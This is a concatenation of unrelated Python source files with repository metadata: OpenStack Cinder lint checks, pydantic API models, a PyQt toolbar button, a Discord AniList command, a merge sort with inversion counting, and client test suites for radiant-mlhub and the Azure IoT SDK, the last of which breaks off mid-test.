# being defined in the subclasses.
message = message or self.CHECK_DESC # pylint: disable=E1101
error = (node.lineno, node.col_offset, message, self.__class__)
self._errors.append(error)
def _check_call_names(self, call_node, names):
if isinstance(call_node, ast.Call):
if isinstance(call_node.func, ast.Name):
if call_node.func.id in names:
return True
return False
@core.flake8ext
def no_translate_logs(logical_line, filename):
"""Check for 'LOG.*(_('
Starting with the Pike series, OpenStack no longer supports log
translation. We shouldn't translate logs.
- This check assumes that 'LOG' is a logger.
- Use filename so we can start enforcing this in specific folders
instead of needing to do so all at once.
C312
"""
if translated_log.match(logical_line):
yield(0, "C312: Log messages should not be translated!")
@core.flake8ext
def no_mutable_default_args(logical_line):
msg = "N322: Method's default argument shouldn't be mutable!"
if mutable_default_args.match(logical_line):
yield (0, msg)
@core.flake8ext
def check_explicit_underscore_import(logical_line, filename):
"""Check for explicit import of the _ function
We need to ensure that any files that are using the _() function
to translate messages are explicitly importing the _ function. We
can't trust unit test to catch whether the import has been
added so we need to check for it here.
"""
# Build a list of the files that have _ imported. No further
# checking needed once it is found.
for file in UNDERSCORE_IMPORT_FILES:
if file in filename:
return
if (underscore_import_check.match(logical_line) or
underscore_import_check_multi.match(logical_line) or
custom_underscore_check.match(logical_line)):
UNDERSCORE_IMPORT_FILES.append(filename)
elif string_translation.match(logical_line):
yield(0, "N323: Found use of _() without explicit import of _ !")
class CheckLoggingFormatArgs(BaseASTChecker):
"""Check for improper use of logging format arguments.
LOG.debug("Volume %s caught fire and is at %d degrees C and climbing.",
('volume1', 500))
The format arguments should not be a tuple as it is easy to miss.
"""
name = 'check_logging_format_args'
version = '1.0'
CHECK_DESC = 'C310 Log method arguments should not be a tuple.'
LOG_METHODS = [
'debug', 'info',
'warn', 'warning',
'error', 'exception',
'critical', 'fatal',
'trace', 'log'
]
def _find_name(self, node):
"""Return the fully qualified name or a Name or Attribute."""
if isinstance(node, ast.Name):
return node.id
elif (isinstance(node, ast.Attribute)
and isinstance(node.value, (ast.Name, ast.Attribute))):
method_name = node.attr
obj_name = self._find_name(node.value)
if obj_name is None:
return None
return obj_name + '.' + method_name
elif isinstance(node, str):
return node
else: # could be Subscript, Call or many more
return None
def visit_Call(self, node):
"""Look for the 'LOG.*' calls."""
# extract the obj_name and method_name
if isinstance(node.func, ast.Attribute):
obj_name = self._find_name(node.func.value)
if isinstance(node.func.value, ast.Name):
method_name = node.func.attr
elif isinstance(node.func.value, ast.Attribute):
obj_name = self._find_name(node.func.value)
method_name = node.func.attr
else: # could be Subscript, Call or many more
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# obj must be a logger instance and method must be a log helper
if (obj_name != 'LOG'
or method_name not in self.LOG_METHODS):
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# the call must have arguments
if not len(node.args):
return super(CheckLoggingFormatArgs, self).generic_visit(node)
# any argument should not be a tuple
for arg in node.args:
if isinstance(arg, ast.Tuple):
self.add_error(arg)
return super(CheckLoggingFormatArgs, self).generic_visit(node)
class CheckOptRegistrationArgs(BaseASTChecker):
"""Verifying the registration of options are well formed
This class creates a check for single opt or list/tuple of
opts when register_opt() or register_opts() are being called.
"""
name = 'check_opt_registrationg_args'
version = '1.0'
CHECK_DESC = ('C311: Arguments being passed to register_opt/register_opts '
'must be a single option or list/tuple of options '
'respectively. Options must also end with _opt or _opts '
'respectively.')
singular_method = 'register_opt'
plural_method = 'register_opts'
register_methods = [
singular_method,
plural_method,
]
def _find_name(self, node):
"""Return the fully qualified name or a Name or Attribute."""
if isinstance(node, ast.Name):
return node.id
elif (isinstance(node, ast.Attribute)
and isinstance(node.value, (ast.Name, ast.Attribute))):
method_name = node.attr
obj_name = self._find_name(node.value)
if obj_name is None:
return None
return obj_name + '.' + method_name
elif isinstance(node, str):
return node
else: # could be Subscript, Call or many more
return None
def _is_list_or_tuple(self, obj):
return isinstance(obj, (ast.List, ast.Tuple))
def visit_Call(self, node):
"""Look for the register_opt/register_opts calls."""
# extract the obj_name and method_name
if isinstance(node.func, ast.Attribute):
if not isinstance(node.func.value, ast.Name):
return (super(CheckOptRegistrationArgs,
self).generic_visit(node))
method_name = node.func.attr
# obj must be instance of register_opt() or register_opts()
if method_name not in self.register_methods:
return (super(CheckOptRegistrationArgs,
self).generic_visit(node))
if len(node.args) > 0:
argument_name = self._find_name(node.args[0])
if argument_name:
if (method_name == self.singular_method and
not argument_name.lower().endswith('opt')):
self.add_error(node.args[0])
elif (method_name == self.plural_method and
not argument_name.lower().endswith('opts')):
self.add_error(node.args[0])
else:
# This covers instances of register_opt()/register_opts()
# that are registering the objects directly and not
# passing in a variable referencing the options being
# registered.
if (method_name == self.singular_method and
self._is_list_or_tuple(node.args[0])):
self.add_error(node.args[0])
elif (method_name == self.plural_method and not
self._is_list_or_tuple(node.args[0])):
self.add_error(node.args[0])
return super(CheckOptRegistrationArgs, self).generic_visit(node)
@core.flake8ext
def check_datetime_now(logical_line, noqa):
if noqa:
return
msg = ("C301: Found datetime.now(). "
"Please use timeutils.utcnow() from oslo_utils.")
if 'datetime.now' in logical_line:
yield(0, msg)
@core.flake8ext
def check_no_print_statements(logical_line, filename, noqa):
# CLI and utils programs do need to use 'print()' so
# we shouldn't check those files.
if noqa:
return
if "cinder/cmd" in filename or "tools/" in filename:
return
if re.match(no_print_statements, logical_line):
msg = ("C303: print() should not be used. "
"Please use LOG.[info|error|warning|exception|debug]. "
"If print() must be used, use '# noqa' to skip this check.")
yield(0, msg)
@core.flake8ext
def check_timeutils_strtime(logical_line):
msg = ("C306: Found timeutils.strtime(). "
"Please use datetime.datetime.isoformat() or datetime.strftime()")
if 'timeutils.strtime' in logical_line:
yield(0, msg)
@core.flake8ext
def dict_constructor_with_list_copy(logical_line):
msg = ("N336: Must use a dict comprehension instead of a dict constructor "
"with a sequence of key-value pairs.")
if dict_constructor_with_list_copy_re.match(logical_line):
yield (0, msg)
@core.flake8ext
def check_timeutils_isotime(logical_line):
msg = ("C308: Found timeutils.isotime(). "
"Please use datetime.datetime.isoformat()")
if 'timeutils.isotime' in logical_line:
yield(0, msg)
@core.flake8ext
def no_test_log(logical_line, filename, noqa):
if ('cinder/tests' not in filename or noqa):
return
msg = "C309: Unit tests should not perform logging."
if logging_instance.match(logical_line):
yield (0, msg)
@core.flake8ext
def validate_assertTrue(logical_line, filename):
# Note: a comparable check cannot be implemented for
# assertFalse(), because assertFalse(None) passes.
# Therefore, assertEqual(False, value) is required to
# have the strongest test.
if 'cinder/tests/unit' not in filename:
return
if re.match(assert_True, logical_line):
msg = ("C313: Unit tests should use assertTrue(value) instead"
" of using assertEqual(True, value).")
yield(0, msg)
third_party_mock = re.compile("^import.mock")
from_third_party_mock = re.compile("^from.mock.import")
@core.flake8ext
def no_third_party_mock(logical_line):
# We should only use unittest.mock, not the third party mock library that
# was needed for py2 support.
if (re.match(third_party_mock, logical_line) or
re.match(from_third_party_mock, logical_line)):
msg = ('C337: Unit tests should use the standard library "mock" '
'module, not the third party mock lib.')
yield(0, msg)
| 36.275064
| 79
| 0.638013
|
5aeb136361b33cf15c31e98429e70ac5071ad578
| 4,725
|
py
|
Python
|
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
local_data_api/models.py
|
Apoalex92/local-data-api
|
19e9274c20b9eaabc4bc619a0aa75c9a7fa9020b
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
from base64 import b64encode
from datetime import date, datetime, time
from decimal import Decimal
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Union
from pydantic import BaseModel
from pydantic import Field as Field_
TYPE_HINT_TO_CONVERTER: Dict[str, Callable[[Any], Any]] = {
'DECIMAL': Decimal,
'TIMESTAMP': datetime.fromisoformat,
'TIME': time.fromisoformat,
'DATE': date.fromisoformat,
}
class Field(BaseModel):
blobValue: Optional[str] # Type: Base64-encoded binary data object
booleanValue: Optional[bool]
doubleValue: Optional[float]
isNull: Optional[bool]
longValue: Optional[int]
stringValue: Optional[str]
@classmethod
def from_value(cls, value: Any) -> Field:
if isinstance(value, bool):
return cls(booleanValue=value)
elif isinstance(value, str):
return cls(stringValue=value)
elif isinstance(value, int):
return cls(longValue=value)
elif isinstance(value, float):
return cls(doubleValue=value)
elif isinstance(value, bytes):
return cls(blobValue=b64encode(value))
elif value is None:
return cls(isNull=True)
elif type(value).__name__.endswith('UUID'):
return cls(stringValue=str(value))
elif type(value).__name__.endswith('PGobject'):
return cls(stringValue=str(value))
elif type(value).__name__.endswith('BigInteger'):
return cls(longValue=int(str(value)))
else:
raise Exception(f'unsupported type {type(value)}: {value} ')
class SqlParameter(BaseModel):
name: str
value: Field
type_hint: Optional[str] = Field_(None, alias='typeHint')
@property
def valid_value(self: SqlParameter) -> Union[Union[None, Decimal, datetime], Any]:
for key, value in self.value.dict(exclude_unset=True).items():
if key == 'isNull' and value:
return None
if key == 'stringValue' and self.type_hint:
TYPE_HINT_TO_CONVERTER[self.type_hint](value) # only validation
return value
return None
class ExecuteSqlRequest(BaseModel):
awsSecretStoreArn: str
dbClusterOrInstanceArn: str
sqlStatements: str
database: Optional[str]
schema_: Optional[str] = Field_(None, alias='schema')
class ExecuteStatementRequests(BaseModel):
resourceArn: str
secretArn: str
sql: str
database: Optional[str]
continueAfterTimeout: Optional[bool]
includeResultMetadata: bool = False
parameters: Optional[List[SqlParameter]]
schema_: Optional[str] = Field_(None, alias='schema')
transactionId: Optional[str]
class ColumnMetadata(BaseModel):
arrayBaseColumnType: Optional[int]
isAutoIncrement: Optional[bool]
isCaseSensitive: Optional[bool]
isCurrency: Optional[bool]
isSigned: Optional[bool]
label: Optional[str]
name: Optional[str]
nullable: Optional[int]
precision: Optional[int]
scale: Optional[int]
schema_: Optional[str] = Field_(None, alias='schema')
tableName: Optional[str]
type: Optional[int]
typeName: Optional[str]
class ExecuteStatementResponse(BaseModel):
numberOfRecordsUpdated: int
generatedFields: Optional[List[Field]]
records: Optional[List[List[Field]]]
columnMetadata: Optional[List[ColumnMetadata]]
class BeginTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
schema_: Optional[str] = Field_(None, alias='schema')
database: Optional[str]
class BeginTransactionResponse(BaseModel):
transactionId: str
class CommitTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
transactionId: str
class TransactionStatus(Enum):
transaction_committed = 'Transaction Committed'
rollback_complete = 'Rollback Complete'
class CommitTransactionResponse(BaseModel):
transactionStatus: TransactionStatus
class RollbackTransactionRequest(BaseModel):
resourceArn: str
secretArn: str
transactionId: str
class RollbackTransactionResponse(BaseModel):
transactionStatus: TransactionStatus
class BatchExecuteStatementRequests(BaseModel):
resourceArn: str
secretArn: str
sql: str
database: Optional[str]
continueAfterTimeout: Optional[bool]
includeResultMetadata: Optional[bool]
parameterSets: Optional[List[List[SqlParameter]]]
schema_: Optional[str] = Field_(None, alias='schema')
transactionId: Optional[str]
class UpdateResult(BaseModel):
generatedFields: List[Field]
class BatchExecuteStatementResponse(BaseModel):
updateResults: List[UpdateResult]
| 28.293413
| 86
| 0.700741
|
1db6bc1256dbdab53489d47cf4851b977810125b
| 1,656
|
py
|
Python
|
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
kunquat/tracker/ui/views/sheet/replacebutton.py
|
cyberixae/kunquat
|
06ae72b2c1519686cc510ce887d9d45a5c3fa3a3
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Author: Tomi Jylhä-Ollila, Finland 2014
#
# This file is part of Kunquat.
#
# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/
#
# To the extent possible under law, Kunquat Affirmers have waived all
# copyright and related or neighboring rights to Kunquat.
#
from PyQt4.QtCore import *
from PyQt4.QtGui import *
class ReplaceButton(QToolButton):
def __init__(self):
QToolButton.__init__(self)
self._ui_model = None
self._updater = None
self._sheet_manager = None
self.setCheckable(True)
self.setText('Replace')
self.setToolTip('Replace (Insert)')
def set_ui_model(self, ui_model):
self._ui_model = ui_model
self._updater = ui_model.get_updater()
self._updater.register_updater(self._perform_updates)
self._sheet_manager = ui_model.get_sheet_manager()
icon_bank = self._ui_model.get_icon_bank()
icon_path = icon_bank.get_icon_path('replace')
icon = QIcon(icon_path)
self.setIcon(icon)
QObject.connect(self, SIGNAL('clicked()'), self._clicked)
def unregister_updaters(self):
self._updater.unregister_updater(self._perform_updates)
def _perform_updates(self, signals):
if 'signal_replace_mode' in signals:
self._update_checked()
def _update_checked(self):
old_block = self.blockSignals(True)
is_checked = self._sheet_manager.get_replace_mode()
self.setChecked(is_checked)
self.blockSignals(old_block)
def _clicked(self):
self._sheet_manager.set_replace_mode(self.isChecked())
| 27.6
| 70
| 0.682367
|
e247eef10ee10ab97e46d7055b02b982ce1f2017
| 3,096
|
py
|
Python
|
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
modules/disabled/api_anilist.py
|
Kubinyete/navibot
|
89526dcbab322aa135a7ee517d2c0f454b4550be
|
[
"MIT"
] | null | null | null |
import io
from navibot.client import BotCommand, Slider
from navibot.errors import CommandError
from libs.anilist import AniListApi
class CAnilist(BotCommand):
def __init__(self, bot):
super().__init__(
bot,
name = "anilist",
aliases = ['anl'],
description = "Exibe um Slider com o resultados de uma pesquisa por personagens utilizando `--character`.",
usage = "[-c|--character] [busca...] [--page=1]"
)
self.api = AniListApi(self.bot.get_http_session())
async def run(self, message, args, flags):
if 'character' in flags or 'c' in flags:
try:
page = flags.get('page', 1)
if type(page) is str:
page = int(page)
if page <= 0:
page = 1
except ValueError:
raise CommandError("É preciso informar um número ")
characters = await self.api.search_characters(' '.join(args), page=page, limit=20)
if characters:
items = []
for c in characters:
embed = self.create_response_embed(message)
embed.title = f"{c['name']['full']}" if not c['name'].get('native', False) else f"{c['name']['full']} ({c['name']['native']})"
embed.description = self.format_anilist_description(c['description'])
embed.set_thumbnail(url=c['image']['large'])
embed.add_field(name='Favourites', value=f":heart: {c['favourites']}")
items.append(embed)
return Slider(
self.bot,
message,
items
)
else:
return ':information_source: Não foi encontrando nenhum personagem.'
else:
return self.get_usage_embed(message)
@staticmethod
def format_anilist_description(description):
if description and len(description) > 0:
spoiler = False
ignore_next = False
fdes = io.StringIO()
for i in range(len(description)):
c = description[i]
cnext = description[i + 1] if i + 1 < len(description) else ''
if fdes.tell() >= 2043:
if spoiler:
fdes.write("...||")
else:
fdes.write("...")
break
elif ignore_next:
ignore_next = False
elif c == "~" and cnext == "!" and not spoiler:
spoiler = True
ignore_next = True
fdes.write("||")
elif c == "!" and cnext == "~" and spoiler:
spoiler = False
ignore_next = True
fdes.write("||")
else:
fdes.write(c)
return fdes.getvalue()
else:
return "Nenhuma descrição está disponível."
| 34.786517
| 146
| 0.476421
|
4288a9929c057a4c012430e03bf585ab28ccbd91
| 2,236
|
py
|
Python
|
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
Course_1/mergesort_countinv.py
|
julesbertrand/Stanford-alg
|
068a76d3b3108df6fb09136fbfe373648bbfbe90
|
[
"MIT"
] | null | null | null |
"""
### Merge sort
Complexity:
- $6n$ operations per level
- $\log_2(n)$ recursive calls
- Total in time : $6n \log_2(n) + 6n = O(n\log(n))$
- In memory: $O(n)$ as need not in place
Inversions algorithm
Complexity:
same as merge sort, $O(n\log(n))$ in time and $O(n)$ in memory
"""
import numpy as np
def merge_sort(A):
def merge_sort_(A, l, r):
if l < r:
m = (l + r - 1) // 2
merge_sort_(A, l, m)
merge_sort_(A, m + 1, r)
combine(A, l, m, r)
def combine(A, l, m, r):
n_l = m - l + 1
n_r = r - m
L = A[l : m + 1]
R = A[m + 1 : r + 1]
i, j, k = 0, 0, l
while i < n_l and j < n_r:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
k += 1
while i < n_l:
A[k] = L[i]
k += 1
i += 1
while j < n_r:
A[k] = R[j]
k += 1
j += 1
return merge_sort_(A, 0, len(A) - 1)
def count_inversions(A):
def sort_and_count_inversions(A, l, r):
if r <= l:
return 0
else:
m = (l + r - 1) // 2
x = sort_and_count_inversions(A, l, m)
y = sort_and_count_inversions(A, m + 1, r)
z = combine_and_count_inv_split(A, l, m, r)
return x + y + z
def combine_and_count_inv_split(A, l, m, r):
n_l = m - l + 1
n_r = r - m
L = A[l : m + 1]
R = A[m + 1 : r + 1]
i, j, k = 0, 0, l
count = 0
while i < n_l and j < n_r:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
count += n_l - i
j += 1
k += 1
while i < n_l:
A[k] = L[i]
k += 1
i += 1
while j < n_r:
A[k] = R[j]
k += 1
j += 1
return count
return sort_and_count_inversions(A, 0, len(A) - 1)
if __name__ == "__main__":
A = np.loadtxt("./Course_1/countinv.txt").tolist()
# A = [1, 23, 5, 2, 4, 6]
count_inversions(A)
| 23.536842
| 62
| 0.386852
|
6addd0ec6af996106ff183a132355ee076aceabf
| 8,928
|
py
|
Python
|
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
test/test_client.py
|
rowenarono95/radiant-mlhub
|
c79629c7b8cd90950224a6424091e8b23c07ec12
|
[
"Apache-2.0"
] | null | null | null |
import os
from radiant_mlhub.session import Session
from urllib.parse import urljoin, parse_qs, urlsplit
import pytest
import radiant_mlhub.client
from radiant_mlhub.exceptions import EntityDoesNotExist, MLHubException, AuthenticationError
class TestClient:
@pytest.mark.vcr
def test_collection_does_not_exist(self):
collection_id = 'no_collection'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.get_collection(collection_id)
assert f'Collection "{collection_id}" does not exist.' == str(excinfo.value)
@pytest.mark.vcr
def test_dataset_does_not_exist(self):
dataset_id = 'no_dataset'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.get_dataset(dataset_id)
assert f'Dataset "{dataset_id}" does not exist.' == str(excinfo.value)
def test_internal_server_dataset_error(self, requests_mock):
# Mock this using requests-mock instead of VCRPY so we can simulate a 500 response
dataset_id = 'internal_server_error'
url = f'https://api.radiant.earth/mlhub/v1/datasets/{dataset_id}'
requests_mock.get(url, status_code=500, reason='Internal Server Error')
with pytest.raises(MLHubException):
radiant_mlhub.client.get_dataset(dataset_id)
def test_internal_server_collections_error(self, requests_mock):
collection_id = 'internal_error'
endpoint = f'https://api.radiant.earth/mlhub/v1/collections/{collection_id}'
requests_mock.get(endpoint, status_code=500, reason='Internal Server Error')
with pytest.raises(MLHubException) as excinfo:
radiant_mlhub.client.get_collection(collection_id)
assert 'Internal Server Error' in str(excinfo.value)
@pytest.mark.vcr
def test_list_collection_items(self):
items = list(radiant_mlhub.client.list_collection_items('ref_african_crops_kenya_02_source', limit=40))
assert len(items) == 40
assert 'assets' in items[0]
assert items[0]['id'] == 'ref_african_crops_kenya_02_tile_02_20190721'
# Test pagination break
items = list(radiant_mlhub.client.list_collection_items('ref_african_crops_kenya_02_source', limit=100))
assert len(items) == 52
@pytest.mark.vcr
def test_get_collection_item(self):
item = radiant_mlhub.client.get_collection_item(
'ref_african_crops_kenya_02_source',
'ref_african_crops_kenya_02_tile_02_20190721'
)
assert item['id'] == 'ref_african_crops_kenya_02_tile_02_20190721'
@pytest.mark.vcr
def test_get_collection_item_errors(self):
# Mock 404 response for collection and/or item not existing
collection_id = 'no_collection'
item_id = 'item_id'
with pytest.raises(EntityDoesNotExist):
radiant_mlhub.client.get_collection_item(
collection_id,
item_id
)
@pytest.mark.vcr
def test_download_archive(self, tmp_path):
# Set CWD to temp path
os.chdir(tmp_path)
# Let output_dir default to CWD
output_path = radiant_mlhub.client.download_archive('ref_african_crops_kenya_02_labels')
assert output_path == tmp_path / 'ref_african_crops_kenya_02_labels.tar.gz'
assert output_path.exists()
@pytest.mark.vcr
def test_download_archive_does_not_exist(self, tmp_path):
archive_id = 'no_archive'
with pytest.raises(EntityDoesNotExist) as excinfo:
radiant_mlhub.client.download_archive(archive_id, output_dir=tmp_path)
assert f'Archive "{archive_id}" does not exist and may still be generating. ' \
'Please try again later.' == str(excinfo.value)
def test_download_archive_only_accepts_dir(self, tmp_path):
# Test error if file path is provided
tmp_file = tmp_path / 'test.txt'
tmp_file.touch()
with pytest.raises(ValueError):
radiant_mlhub.client.download_archive('_', output_dir=tmp_file)
@pytest.mark.vcr
def test_skip_download_exists(self, tmp_path):
collection_id = 'ref_african_crops_kenya_02_labels'
expected_output_path = tmp_path / f'{collection_id}.tar.gz'
expected_output_path.touch(exist_ok=True)
original_size = expected_output_path.stat().st_size
# Test if_exists = 'skip' (default)
output_path = radiant_mlhub.client.download_archive(
collection_id,
output_dir=tmp_path,
if_exists='skip'
)
assert output_path.stat().st_size == original_size
@pytest.mark.vcr
def test_overwrite_download_exists(self, tmp_path):
collection_id = 'ref_african_crops_kenya_02_labels'
expected_output_path = tmp_path / f'{collection_id}.tar.gz'
expected_output_path.touch(exist_ok=True)
original_size = expected_output_path.stat().st_size
# Test overwrite
output_path = radiant_mlhub.client.download_archive(
collection_id,
output_dir=tmp_path,
if_exists='overwrite'
)
assert output_path.stat().st_size > original_size
class TestAnonymousClient:
@pytest.fixture(scope='function', autouse=True)
def mock_profile(self):
pass
def test_list_datasets_anonymously_has_no_key(self, requests_mock):
url = urljoin(Session.ROOT_URL, 'datasets')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json=[])
_ = radiant_mlhub.client.list_datasets(profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_datasets_anonymously_works(self):
datasets = radiant_mlhub.client.list_datasets(profile="__anonymous__")
assert len(datasets) > 0
def test_list_collections_anonymously_has_no_key(self, requests_mock):
url = urljoin(Session.ROOT_URL, 'collections')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={"collections": []})
_ = radiant_mlhub.client.list_collections(profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_collections_anonymously_works(self):
collections = radiant_mlhub.client.list_collections(profile="__anonymous__")
assert len(collections) > 0
def test_get_collection_anonymously_has_no_key(self, requests_mock):
collection_id = 'bigearthnet_v1_source'
url = urljoin(Session.ROOT_URL, f'collections/{collection_id}')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={})
_ = radiant_mlhub.client.get_collection(collection_id, profile="__anonymous__")
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_get_collection_anonymously_works(self):
collection_id = 'bigearthnet_v1_source'
collection = radiant_mlhub.client.get_collection(collection_id, profile="__anonymous__")
assert isinstance(collection, dict)
def test_list_collection_items_anonymously_has_no_key(self, requests_mock):
collection_id = "bigearthnet_v1_source"
url = urljoin(Session.ROOT_URL, f'collections/{collection_id}/items')
# Don't really care about the response here, since we're just interested in the request
# parameters. We test that this gives a valid response in a different test
requests_mock.get(url, json={"features": []})
_ = list(radiant_mlhub.client.list_collection_items(collection_id, profile="__anonymous__"))
history = requests_mock.request_history
actual_url = history[0].url
qs = parse_qs(urlsplit(actual_url).query)
assert "key" not in qs
@pytest.mark.vcr
def test_list_collection_items_anonymously_does_not_work(self):
collection_id = "bigearthnet_v1_source"
with pytest.raises(AuthenticationError) as excinfo:
_ = list(radiant_mlhub.client.list_collection_items(collection_id, profile="__anonymous__"))
assert "No API key provided" in str(excinfo.value)
| 38.317597
| 112
| 0.699933
|
d964e44cb575cab78593d5119a02ad97491338db
| 72,266
|
py
|
Python
|
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
azure-iot-device/tests/iothub/shared_client_tests.py
|
jimbobbennett/azure-iot-sdk-python
|
06cee421761d80b9d7d761bd23a7c6876bf7fdd3
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains tests that are shared between sync/async clients
i.e. tests for things defined in abstract clients"""
import pytest
import logging
import os
import io
import six
import socks
import time
import six.moves.urllib as urllib
from azure.iot.device.common import auth
from azure.iot.device.common.auth import sastoken as st
from azure.iot.device.common.auth import connection_string as cs
from azure.iot.device.iothub.pipeline import IoTHubPipelineConfig
from azure.iot.device.common.pipeline.config import DEFAULT_KEEPALIVE
from azure.iot.device.iothub.abstract_clients import (
RECEIVE_TYPE_NONE_SET,
RECEIVE_TYPE_HANDLER,
RECEIVE_TYPE_API,
)
from azure.iot.device.iothub import edge_hsm
from azure.iot.device import ProxyOptions
from azure.iot.device import exceptions as client_exceptions
logging.basicConfig(level=logging.DEBUG)
####################
# HELPER FUNCTIONS #
####################
def token_parser(token_str):
"""helper function that parses a token string for indvidual values"""
token_map = {}
kv_string = token_str.split(" ")[1]
kv_pairs = kv_string.split("&")
for kv in kv_pairs:
t = kv.split("=")
token_map[t[0]] = t[1]
return token_map
################################
# SHARED DEVICE + MODULE TESTS #
################################
class SharedIoTHubClientInstantiationTests(object):
@pytest.mark.it(
"Stores the MQTTPipeline from the 'mqtt_pipeline' parameter in the '_mqtt_pipeline' attribute"
)
def test_mqtt_pipeline_attribute(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline is mqtt_pipeline
@pytest.mark.it(
"Stores the HTTPPipeline from the 'http_pipeline' parameter in the '_http_pipeline' attribute"
)
def test_sets_http_pipeline_attribute(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._http_pipeline is http_pipeline
@pytest.mark.it("Sets on_connected handler in the MQTTPipeline")
def test_sets_on_connected_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_connected is not None
assert client._mqtt_pipeline.on_connected == client._on_connected
@pytest.mark.it("Sets on_disconnected handler in the MQTTPipeline")
def test_sets_on_disconnected_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_disconnected is not None
assert client._mqtt_pipeline.on_disconnected == client._on_disconnected
@pytest.mark.it("Sets on_method_request_received handler in the MQTTPipeline")
def test_sets_on_method_request_received_handler_in_pipleline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_method_request_received is not None
assert (
client._mqtt_pipeline.on_method_request_received
== client._inbox_manager.route_method_request
)
@pytest.mark.it("Sets the Receive Mode/Type for the client as yet-unchosen")
def test_initial_receive_mode(self, client_class, mqtt_pipeline, http_pipeline):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._receive_type == RECEIVE_TYPE_NONE_SET
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubClientCreateMethodUserOptionTests(object):
@pytest.fixture
def option_test_required_patching(self, mocker):
"""Override this fixture in a subclass if unique patching is required"""
pass
@pytest.mark.it(
"Sets the 'product_info' user option parameter on the PipelineConfig, if provided"
)
def test_product_info_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
product_info = "MyProductInfo"
client_create_method(*create_method_args, product_info=product_info)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
assert config == mock_http_pipeline_init.call_args[0][0]
assert config.product_info == product_info
@pytest.mark.it(
"Sets the 'websockets' user option parameter on the PipelineConfig, if provided"
)
def test_websockets_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
client_create_method(*create_method_args, websockets=True)
# Get configuration object, and ensure it was used for both protocol pipelines
assert mock_mqtt_pipeline_init.call_count == 1
